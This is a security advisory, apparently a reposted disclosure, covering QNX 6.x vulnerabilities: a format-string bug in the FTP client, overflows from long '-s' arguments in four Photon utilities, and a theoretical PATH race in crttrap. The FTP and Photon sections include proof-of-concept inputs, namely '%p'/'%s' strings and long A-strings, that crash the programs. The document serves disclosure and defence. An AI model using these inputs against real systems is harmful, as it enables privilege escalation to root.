|
Brought to you by:
Suppliers of:
|
|
|
| |
"QNX Software Systems has provided OS technology, development tools, and professional services to companies building mission-critical embedded systems. Since 1980 manufacturers have relied on QNX OS technology to power their missioncritical applications - everything from medical instruments and Internet routers to telematics devices, 9-1-1 call centers, process control applications and air traffic control systems. Small or large, simple or distributed, these systems share an unmatched reputation for operating 24 hours a day, 365 days a year, nonstop .
Multiple vulnerabilities in several components in the QNX system allows a local or remote user to escalate privileges and run malicious machine code on the target machine. |
| |
Credit:
The information has been provided by Julio Cesar Fort.
|
| |
* Format String Vulnerability in QNX FTP Client:
QNX 6.1 FTP client is vulnerable to a format string in 'quote' command. If successfully exploited, memory corruption occurs and attackers can obtain 'bin' group privileges. This kind of privilege can be useful for back dooring purposes, for example.
Example:
# ftp 127.0.0.1
Connected to 127.0.0.1.
220 sandimas FTP server (Version 5.60) ready.
Name (127.0.0.1:root): sandimas
331 Password required for sandimas.
Password:
230 User sandimas logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote site exec "%p.%p.%p.%p"
500 'SITE EXEC 805b730.0.0.805b180': command not understood.
ftp> quote "%s.%s.%s.%s"
Memory fault (core dumped)
#
* Multiple Buffer Overflows in Photon Graphics Library:
Buffer overflows conditions occurs in four binaries of Photon. The result of a well-succeeded exploitation is memory corruption - in other words, a high risk for local security. Once these binaries are suid and owned by root, then malicious users can obtain unauthorized root privileges. All problems lies in '-s' (server) flag, which allows an user to chose the name of the Photon server. The vulnerable binary tries to open /dev/AAAAA... (around 94 A's are necessary to cause overflow) then it crashes.
Example:
=> Config for phrelay (remote connector with phindows and phditto clients)
$ /usr/photon/bin/phrelay-cfg -s AAAAA[...]
Memory fault (core dumped)
-> Localization utility, timezone, language and keyboard configurator
$ /usr/photon/bin/phlocale -s AAAAA[...]
Memory fault (core dumped)
-> QNX Package Installer
$ /usr/photon/bin/pkg-installer -s AAAAA[...]
Memory fault (core dumped)
PS: 'pkg-installer' was replaced by 'qnxinstall' in QNX Momentics 6.2.1.
-> Mouse configurator and stuff
$ /usr/photon/bin/input-cfg -s AAAAA[...]
Memory fault (core dumped)
Core files are generated in /var/dumps.
* Possible Race Condition in crrtrap Video Hardware Detection Tool:
Crttrap runs a sequence of commands before the call to 'io-graphics', an external program part of the Photon graphics library. Because of this, there is a theoretical race condition vulnerability.
(1) /bin/cd /usr/photon/bin
(*)
(2) io-graphics [arguments]
This spot (*) is where the race condition lies. If we are able to modify $PATH in the exact moment before crrtrap calls step 2, we could obtain local root privileges because it will execute 'io-graphics' (our code) looking for it in /tmp directory. If an attacker writes a code for a never ending loop changing every time $PATH and runs it into background, there is a theoretical possibility to modify environment and trick crttrap.
Disclosure Timeline:
15 Aug 2004: FTP Client vulnerability detected;
26 Aug 2004: Photon and crrtrap vulnerabilities detected;
08 Sep 2004: rfdslabs contacts QNX: no success
|
|
|
|
|
